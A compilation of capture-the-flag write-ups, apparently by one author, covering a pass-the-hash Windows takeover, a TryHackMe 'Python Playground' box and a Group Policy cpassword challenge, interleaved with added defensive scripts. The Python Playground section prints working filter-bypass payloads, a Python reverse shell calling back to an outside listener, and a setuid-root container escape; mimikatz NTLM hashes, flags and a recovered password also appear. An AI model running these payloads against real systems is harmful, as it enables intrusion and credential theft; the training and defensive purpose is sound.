NTLM : 2f77331cfd7b2142b3a86a7d2ce7e824

RID : 000003e8 (1000)
User : ROAST$
LM :
NTLM : 0db85ab8c8395c6c1333a4e9e90ae400

mimikatz(commandline) # exit
Bye!
*Evil-WinRM* PS C:\users\roastsvc\Documents>
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u Administrator -H f6861a8cfc1c3b9f3ff39a8adb6bd388

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>


kali@kali:/opt/evil-winrm$ psexec.py -hashes f6861a8cfc1c3b9f3ff39a8adb6bd388:f6861a8cfc1c3b9f3ff39a8adb6bd388 administrator@172.31.3.2
Impacket v0.9.22.dev1+20200813.221956.1c893884 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 172.31.3.2.....
[*] Found writable share ADMIN$
[*] Uploading file EqimrmMk.exe
[*] Opening SVCManager on 172.31.3.2.....
[*] Creating service Plxk on 172.31.3.2.....
[*] Starting service Plxk.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
Roast

C:\Windows\system32>


kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u Administrator -H f6861a8cfc1c3b9f3ff39a8adb6bd388

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
Roast
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\desktop> type system.txt.txt
9d91f887b78d82444a5af8bbd0d115db


*Evil-WinRM* PS C:\Users> Get-ChildItem -Path C:\Users -Filter *.txt.txt -Recurse -ErrorAction SilentlyContinue -Force
*Evil-WinRM* PS C:\Users\Administrator\desktop> type system.txt.txt
9d91f887b78d82444a5af8bbd0d115db
*Evil-WinRM* PS C:\Users> type C:\Users\roastsvc\Desktop\access.txt
0042894e0a6b2bc2c4517c5f7ccc5c16


 

https://m.twitch.tv/videos/708116376

Author : Puckiestyle

 

thm-pythonplayground-nl


Jump in and grab those flags! They can all be found in the usual places (/home/someuser and /root).


#1 What is flag 1?
THM{7e0b5cf043975e3c104a458a8d4f6f2f}
THM{69a36d6f9da10d23ca0dbfdf6e691ec5}
#2 What is flag 2?
THM{69a36d6f9da10d23ca0dbfdf6e691ec5}
#3 What is flag 3?
THM{be3adc69c25ad14eb79da4eb57925ad1}

I started with an nmap scan.

nmap -T4 -p- -A 10.10.1.16
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-09 21:31 IST
Nmap scan report for 10.10.79.248
Host is up (0.25s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f4:af:2f:f0:42:8a:b5:66:61:3e:73:d8:0d:2e:1c:7f (RSA)
|   256 36:f0:f3:aa:6b:e3:b9:21:c8:88:bd:8d:1c:aa:e2:cd (ECDSA)
|_  256 54:7e:3f:a9:17:da:63:f2:a2:ee:5c:60:7d:29:12:55 (ED25519)
80/tcp open  http    Node.js Express framework
|_http-title: Python Playground!
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   448.71 ms 10.9.0.1
2   448.82 ms 10.10.79.248

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.00 seconds

This showed that two ports, 22 and 80, are open. Moving on to the website hosted on port 80, I found the homepage with the title Secure Python Playground.

The Login and Signup links led nowhere except a "Go Back" page.

I ran ffuf to find hidden directories and pages.

kali@kali:~/thm/python$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u "http://10.10.22.8/FUZZ" -e .php,.html,.txt,.zip

        v1.0.2
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.22.8/FUZZ
 :: Extensions       : .php .html .txt .zip
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

admin.html              [Status: 200, Size: 3134, Words: 667, Lines: 118]
login.html              [Status: 200, Size: 549, Words: 152, Lines: 19]
index.html              [Status: 200, Size: 941, Words: 308, Lines: 30]
signup.html             [Status: 200, Size: 549, Words: 152, Lines: 19]

This gave me a page, admin.html. The page had a login form and used client-side authentication. The page source gave a link to the page a user would be redirected to after login, and that page worked fine without authentication.

http://10.10.79.248/super-secret-admin-testing-panel.html

Now I can run Python code on this page. I tried to import os but that failed, and after a few attempts I came to know that I can't use the word "import ".

I tried to read files on the machine and was able to read the shadow and passwd files, although they were not useful.

But this told me that I am probably root on the machine the code is being run on.

I tried to read /root/flag1.txt and got the first flag.

f=open("/root/flag1.txt","r")
print(f.read())

Since I had seen a hash in the JavaScript used on the admin.html page, I thought of decrypting it. I reversed the whole process and got the password.

# Each letter of the "hash" is a base-26 digit (a=0 ... z=25); a pair of digits
# encodes one character as a*26+b. The encoding was applied twice, so it is
# reversed twice.
def text_to_unicode(string):
    uni=[]
    for char in string:
        a=ord(char)
        a -= 97
        uni.append(str(a))
    return uni

def unicode_to_text(string):
    out=""
    for char in range(0,len(string),2):
        a = int(string[char])
        b = int(string[char +1])
        temp = a * 26
        temp += b
        out += chr(temp)
    return out

if __name__ == "__main__":
    hash="dxeedxebdwemdwesdxdtdweqdxefdxefdxdudueqduerdvdtdvdu"
    stri1 = text_to_unicode(hash)
    stri2 = unicode_to_text(stri1)
    stri3 = text_to_unicode(stri2)
    password = unicode_to_text(stri3)
    print(password)

I used the password to log in as the connor user through SSH.

Got the second flag.

Now I came to know that the website is running in a Docker container and I am logged in to the host machine.

Since the nmap scan had already told me that the server is the Node.js Express framework, I tried to read index.js from the Python code executor page.

f=open("index.js","r")
print(f.read())
#index.js
const path = require('path');
const fs = require('fs');
const { spawn } = require('child_process');

const express = require('express');
const app = express();
const port = 3000;

app.use(express.urlencoded({
    extended: false
}));

app.use(express.static(path.join(__dirname, 'static')));

function isAllowed(code){
    if(typeof code !== 'string'){
        return false;
    }
    if(code.indexOf('import ') >= 0){
        return false;
    }
    if(code.indexOf('eval') >= 0){
        return false;
    }
    if(code.indexOf('.system') >= 0){
        return false;
    }
    if(code.indexOf('exec') >= 0){
        return false;
    }

    return true;
}

function findAndInsert(str, find, insert){
    const i = str.indexOf(find) + find.length;

    return str.slice(0, i) + insert + str.slice(i);
}

function formatOut(code, output){
    const testingPanelHTML = fs.readFileSync('static/super-secret-admin-testing-panel.html');

    const insertedInput = findAndInsert(testingPanelHTML, '<textarea class="form-control mb-3" name="code">', code);
    const insertedOutput = findAndInsert(insertedInput, '<textarea class="form-control mb-3" readonly>', output);

    return insertedOutput;
}

app.post('/super-secret-admin-testing-panel.html', (req, res) => {
    const code = req.body.code;

    if(isAllowed(code)){
        // Execute the code
        const name = `scripts/${Math.floor(Math.random() * 100000000000)}.py`;
        fs.writeFileSync(name, code);

        const python = spawn('python3', [name]);

        let output = '';
        python.stdout.on('data', (data) => {
            output += data.toString();
        })
        python.stderr.on('data', (data) => {
            output += data.toString();
        })
        python.on('close', (exit_code) => {
            fs.unlinkSync(name);

            output += '\nExit code ' + exit_code;

            res.send(formatOut(code, output));
        })
    }else {
        res.send(formatOut(code, 'Security threat detected!'));
    }
})

app.listen(port, () => console.log('Listening!'));

This shows that import, exec, .system and eval cannot be passed in the code.

This post helped me execute those blacklisted commands.

__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('ls -la')


I uploaded python_pty_backconnect.py from python-pty-shells as a base64-encoded string.

base64 -w 0 tcp_pty_backconnect.py > hash
## Copied the text from the hash file
## and then ran the following command to upload the file
__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('echo -n 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 | base64 -d > run.py')
## This uploaded the file.
## Ran it using
__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('python2 run.py')

Got a reverse shell on the container:

C:\Users\jacco>nc -nlvp 9876
listening on [any] 9876 ...
connect to [10.11.3.122] from (UNKNOWN) [10.10.161.162] 42928
root@playgroundweb:~/app# id
id
uid=0(root) gid=0(root) groups=0(root)
root@playgroundweb:~/app#
Or we do it with the following approach:

Alright, we are able to read files on the system! Let's see if we can create a reverse shell; let's use the Python reverse shell from pentestmonkey:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("11.11.3.122",9876));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Hmmm... Now we get "Security threat detected!". It looks like we are being limited in what we can import; if we just enter import os we get the same error. It looks like it might just be checking for text, so let's try another way of importing os, using something called dunder (double underscore) methods:

os = __import__('os')

If we run this we get a nice clean Exit code 0. Looks like we can use this little trick to bypass the "security":
subprocess = __import__('subprocess')
os = __import__('os')
socket = __import__('socket')

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.3.122",9876));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Don't forget to set up the nc listener on port 9876, and we get a shell! And it looks like a root shell too!
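The two bypasses above (building the name with __import__, and reaching __import__ through __builtins__.__dict__ with case-changed string literals) both defeat isAllowed() because it only looks for four substrings in the source text. The following is an added example, not code from the challenge or the writeup: it parses the submission with Python's ast module and rejects by construct (import statements, dunder names and attributes, calls to builtins that reach the import/exec machinery, and string literals carrying "__" fragments), then runs both checks side by side over the samples from the writeup. Function and constant names here are this example's own.

```python
"""Added example: AST-based screening versus the app's substring blacklist."""
import ast

# Builtins that hand submitted code the interpreter's own import/exec machinery.
DENIED_CALLS = {
    "__import__", "eval", "exec", "compile", "open",
    "getattr", "setattr", "delattr", "globals", "locals", "vars",
    "breakpoint", "input",
}


class Violation(Exception):
    """Raised on the first disallowed construct found in the tree."""


class Screen(ast.NodeVisitor):
    def visit_Import(self, node):
        raise Violation("import statement")

    def visit_ImportFrom(self, node):
        raise Violation("import statement")

    def visit_Name(self, node):
        if node.id.startswith("__"):
            raise Violation(f"dunder name {node.id}")
        self.generic_visit(node)

    def visit_Attribute(self, node):
        if node.attr.startswith("__"):
            raise Violation(f"dunder attribute .{node.attr}")
        self.generic_visit(node)

    def visit_Call(self, node):
        func = node.func
        if isinstance(func, ast.Name) and func.id in DENIED_CALLS:
            raise Violation(f"call to {func.id}")
        self.generic_visit(node)

    def visit_Constant(self, node):
        # A string literal containing "__" is almost always being assembled
        # into a dunder name at runtime, as '__IMPORT__'.lower() is above.
        if isinstance(node.value, str) and "__" in node.value:
            raise Violation("dunder fragment in string literal")


def check_code(code):
    """Return (allowed, reason): allowed only if the source parses and
    contains none of the constructs Screen rejects."""
    try:
        tree = ast.parse(code)
    except SyntaxError as e:
        return False, f"syntax error: {e.msg}"
    try:
        Screen().visit(tree)
    except Violation as v:
        return False, str(v)
    return True, "ok"


def substring_blacklist(code):
    """The app's isAllowed() logic, reproduced for comparison."""
    return not any(b in code for b in ("import ", "eval", ".system", "exec"))


# Constructed samples: one benign script, the plain import the app blocks,
# and the two bypass shapes shown in the writeup above.
SAMPLES = {
    "benign": "print(sum(range(10)))",
    "plain_import": "import os\nos.system('id')",
    "dunder_import": "subprocess = __import__('subprocess')\nsubprocess.call(['id'])",
    "builtins_dict": "__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower())",
}


def compare_filters():
    """Map each sample name to (substring verdict, AST verdict)."""
    return {name: (substring_blacklist(src), check_code(src)[0])
            for name, src in SAMPLES.items()}


if __name__ == "__main__":
    for name, (sub, tree) in compare_filters().items():
        print(f"{name:15} substring={sub!s:5} ast={tree}")
```

The substring filter passes both bypass samples while the AST screen rejects them. Even so, screening Python source is not a sandbox: the code still runs in the same interpreter with the web server's privileges (root, as the id output above shows), so the control that actually matters is running each submission as an unprivileged user in an isolated, network-less process.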
kali@kali:~/thm/python$ cat javadecrypt.py
def text_to_unicode(string):
    # Map each lowercase letter to its offset from 'a' (0..25), kept as a string.
    uni=[]
    for char in string:
        a=ord(char)
        a -= 97
        uni.append(str(a))
    return uni

def unicode_to_text(string):
    # Take the offsets two at a time: the pair (a, b) encodes the character a*26 + b.
    out=""
    for char in range(0,len(string),2):
        a = int(string[char])
        b = int(string[char +1])
        temp = a * 26
        temp += b
        out += chr(temp)
    return out

if __name__ == "__main__":
    # The encoding was applied twice, so it has to be undone twice.
    hash="dxeedxebdwemdwesdxdtdweqdxefdxefdxdudueqduerdvdtdvdu"
    stri1 = text_to_unicode(hash)
    stri2 = unicode_to_text(stri1)
    stri3 = text_to_unicode(stri2)
    password = unicode_to_text(stri3)
    print(password)

kali@kali:~/thm/python$ python javadecrypt.py
spaghetti1245
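The scheme javadecrypt.py undoes is a keyless, two-letter base-26 encoding applied twice, so "decryption" is just inversion. The following is an added example, not the challenge's or the writeup's code: it implements both directions (the decoder generalised to any number of rounds, plus the encoder the challenge author must have used) so the stored value can be regenerated and the decoder checked by round trip. Function names are this example's own; the encoded value is the one from the writeup above.

```python
"""Added example: encoder and decoder for the two-letter base-26 scheme."""


def decode_layer(text):
    """Undo one layer: every pair of letters (a, b), taken as offsets
    from 'a', is one character with code a*26 + b."""
    if len(text) % 2:
        raise ValueError("encoded text must have an even length")
    out = []
    for i in range(0, len(text), 2):
        hi, lo = ord(text[i]) - 97, ord(text[i + 1]) - 97
        if not (0 <= hi < 26 and 0 <= lo < 26):
            raise ValueError(f"non-lowercase symbol at position {i}")
        out.append(chr(hi * 26 + lo))
    return "".join(out)


def encode_layer(text):
    """Apply one layer: character code c becomes the letters for c // 26
    and c % 26. Only codes below 26*26 = 676 fit, which covers ASCII."""
    out = []
    for ch in text:
        c = ord(ch)
        if c >= 26 * 26:
            raise ValueError(f"cannot encode {ch!r}")
        out.append(chr(97 + c // 26) + chr(97 + c % 26))
    return "".join(out)


def decode(text, rounds=2):
    """Peel off `rounds` layers (the challenge used two)."""
    for _ in range(rounds):
        text = decode_layer(text)
    return text


def encode(text, rounds=2):
    """Apply `rounds` layers; exact inverse of decode()."""
    for _ in range(rounds):
        text = encode_layer(text)
    return text


# The encoded password from the writeup above.
HASH = "dxeedxebdwemdwesdxdtdweqdxefdxefdxdudueqduerdvdtdvdu"

if __name__ == "__main__":
    pw = decode(HASH)
    print(pw, "round trip ok:", encode(pw) == HASH)
```

Each layer doubles the length and maps only lowercase letters, which is why the stored value is 52 letters for a 13-character password and why it offers no secrecy: anyone with the "hash" recovers the password without a key.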

We can now log in as connor:

kali@kali:~/thm/python$ ssh connor@10.10.1.16
connor@10.10.1.16's password:spaghetti1245
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-99-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed Aug 12 12:36:45 UTC 2020

System load: 0.0 Processes: 93
Usage of /: 49.4% of 9.78GB Users logged in: 0
Memory usage: 23% IP address for eth0: 10.10.1.16
Swap usage: 0% IP address for docker0: 172.17.0.1


32 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Aug 12 12:18:42 2020 from 10.11.3.122
connor@pythonplayground:~$

Enumerating through the container, I found some logs at /mnt/log.

Ran Linpeas in the container and found that /dev/xvda2 is mounted at /mnt/log; moreover, this xvda2 is not present in the container, rather it is present on the host.

I thought maybe somehow they are connected and sharing same data.

I visited the directory where the logs are stored in Linux, /var/logs, and found that this location is directly linked to /mnt/log in the container, and if I write something through the container then that file is written with root as owner for both the host and the container.

Changed the permissions of the /mnt/log directory to make /var/logs writable by connor: "chmod 777 .".

Thanks again to jammy for making me realize that the /mnt/log in the container was linked to /var/log on the parent machine just like I suspected earlier.
With this in mind we can create a file with suid bit set and execute it afterwards as connor. (This is possible because the root user id is the same across systems)

// ON THE CONTAINER
# printf 'int main(void){setresuid(0,0,0);system("/bin/sh");}'>tmp.c
# gcc tmp.c -o tmp
# chmod 777 tmp
# chmod +s tmp

// ON THE PARENT MACHINE
connor@pythonplayground:~$ /var/log/tmp
# id
uid=0(root) gid=1000(connor) groups=1000(connor)
# 
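The escape works because /var/log on the host is bind-mounted into a container that runs as uid 0, so a file the container writes with the setuid bit is a setuid-root binary on the host. A log directory should never contain setuid or setgid executables, which makes that an easy thing to audit for. The following is an added example, not part of the writeup: it walks a directory tree without following symlinks, reports every regular file with either bit set together with its mode, owner and mtime, and demonstrates itself on a constructed temporary tree. Function names are this example's own.

```python
"""Added example: find setuid/setgid files planted in a log directory."""
import os
import stat
import tempfile
import time


def find_setid_files(root):
    """Return one dict per regular file under root with setuid or setgid set.
    os.lstat is used so a symlink cannot redirect the scan outside root."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                findings.append({
                    "path": path,
                    "mode": oct(stat.S_IMODE(st.st_mode)),
                    "uid": st.st_uid,
                    "setuid": bool(st.st_mode & stat.S_ISUID),
                    "setgid": bool(st.st_mode & stat.S_ISGID),
                    "mtime": time.strftime("%Y-%m-%dT%H:%M:%SZ",
                                           time.gmtime(st.st_mtime)),
                })
    return findings


def demo_scan():
    """Build a constructed log tree with one ordinary log file and one
    setuid file, scan it, and return the flagged paths relative to root."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "nginx"))
        with open(os.path.join(root, "nginx", "access.log"), "w") as f:
            f.write("constructed log line\n")
        planted = os.path.join(root, "tmp")           # same name as in the writeup
        with open(planted, "wb") as f:
            f.write(b"constructed stand-in for a compiled binary\n")
        os.chmod(planted, 0o4755)                     # rwsr-xr-x: setuid set
        return sorted(os.path.relpath(f["path"], root)
                      for f in find_setid_files(root))


if __name__ == "__main__":
    print(demo_scan())
```

Run the scanner against /var/log on the host (and any other directory shared with a container) from cron or a file-integrity job. The underlying fix is not sharing host system directories into a root container at all; where a mount is unavoidable, mounting it nosuid and running the container without uid 0 (user namespaces) would each have stopped this step.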

Author : Puckiestyle


rz-challenge51-nl

Spoiler Alert

challenge at https://ringzer0ctf.com/challenges/51

I Lost my password can you find it?

First, download the file and unzip it.
In order to solve this challenge, you need to decrypt something called "cpassword"; that is easy thanks to this: "Microsoft published the AES encryption key used to protect cpassword attributes in Group Policy preference items (CVE-2014-1812 / MS14-025)."
If you use Windows, you can download this program that does not require installation: https://bitbucket.org/grimhacker/gpppfinder/downloads/

Once downloaded you have to find the following file inside the unzipped challenge file: Policies\{75DE8F0A-DEC0-441F-AE29-90DFAFCF632B}\User\Preferences\Groups\Groups.xml
Once opened, you will see: cpassword=PCXrmCkYWyRRx3bf+zqEydW9/trbFToMDx6fAvmeCDw
This base64 string is missing its padding. You need to add "=" at the end to make it valid.

Once done, execute the program with that base64 password and you will get the following:

gp3finder_v5.0.exe -D PCXrmCkYWyRRx3bf+zqEydW9/trbFToMDx6fAvmeCDw=

Group Policy Preference Password Finder (GP3Finder) 5.0.0
Copyright (C) 2020 Oliver Morton
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions. See GPLv2 License.

INFO: gp3finder: Decrypted password is 10 characters.
INFO: gp3finder: ———-
INFO: gp3finder: LocalRoot!
INFO: gp3finder: ———-
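The same facts (cpassword attributes sit in plain XML under Policies\...\Preferences, the base64 is stored without padding, and the AES-256 key is public since MS14-025) make this a straightforward thing to audit for in your own SYSVOL. The following is an added example, not gp3finder's code or the challenge's: it walks a directory tree, reports every element carrying a cpassword attribute, repairs the padding, and decrypts if the cryptography package is installed (AES-256-CBC, zero IV, PKCS#7 padding, UTF-16LE plaintext, with the key value from the MS14-025 disclosure). Function names and the constructed sample Groups.xml are this example's own; the cpassword and GPO GUID in the sample are the ones from the challenge above.

```python
"""Added example: audit a SYSVOL copy for Group Policy Preference cpasswords."""
import base64
import os
import tempfile
import xml.etree.ElementTree as ET

try:
    from cryptography.hazmat.backends import default_backend
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    HAVE_CRYPTO = True
except ImportError:            # decryption is optional; the audit still runs
    HAVE_CRYPTO = False

# AES-256 key from the MS14-025 / CVE-2014-1812 disclosure (public value).
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8"
    "f496e806cc057990209b09a433b66c1b"
)


def fix_padding(b64):
    """cpassword is stored without base64 padding; restore it."""
    return b64 + "=" * (-len(b64) % 4)


def cpassword_bytes(cpassword):
    """Raw AES ciphertext (always a multiple of 16 bytes for a real value)."""
    return base64.b64decode(fix_padding(cpassword))


def find_cpasswords(root):
    """Return (path relative to root, element tag, cpassword) for every
    element with a cpassword attribute in any .xml file under root."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue
            for el in tree.iter():
                cp = el.get("cpassword")
                if cp:
                    hits.append((os.path.relpath(path, root), el.tag, cp))
    return hits


def decrypt_cpassword(cpassword):
    """AES-256-CBC with an all-zero IV, PKCS#7 unpadding, UTF-16LE decode."""
    if not HAVE_CRYPTO:
        raise RuntimeError("cryptography package not installed")
    dec = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(b"\x00" * 16),
                 backend=default_backend()).decryptor()
    plain = dec.update(cpassword_bytes(cpassword)) + dec.finalize()
    pad = plain[-1]
    if not 1 <= pad <= 16 or plain[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad padding: not a GPP cpassword?")
    return plain[:-pad].decode("utf-16-le")


# Value from the challenge's Groups.xml, reused in a constructed sample file.
CHALLENGE_CPASSWORD = "PCXrmCkYWyRRx3bf+zqEydW9/trbFToMDx6fAvmeCDw"

SAMPLE_GROUPS_XML = f"""<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="Administrator (built-in)">
    <Properties action="U" cpassword="{CHALLENGE_CPASSWORD}" userName="Administrator (built-in)"/>
  </User>
</Groups>
"""


def demo_audit():
    """Write the constructed Groups.xml into a temporary SYSVOL-like tree
    (same relative path as the challenge) and return the audit findings."""
    with tempfile.TemporaryDirectory() as root:
        gpo = os.path.join(root, "Policies", "{75DE8F0A-DEC0-441F-AE29-90DFAFCF632B}",
                           "User", "Preferences", "Groups")
        os.makedirs(gpo)
        with open(os.path.join(gpo, "Groups.xml"), "w", encoding="utf-8") as f:
            f.write(SAMPLE_GROUPS_XML)
        return find_cpasswords(root)


if __name__ == "__main__":
    for path, tag, cp in demo_audit():
        print(path, tag, fix_padding(cp))
        if HAVE_CRYPTO:
            print("  decrypts to:", decrypt_cpassword(cp))
```

Any hit is a finding regardless of whether you decrypt it: every domain user can read SYSVOL, so a cpassword attribute is a plaintext credential. The remediation is the one Microsoft shipped with MS14-025, removing the affected preference items (or the file entirely) and rotating the accounts they set.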

Author : Puckiestyle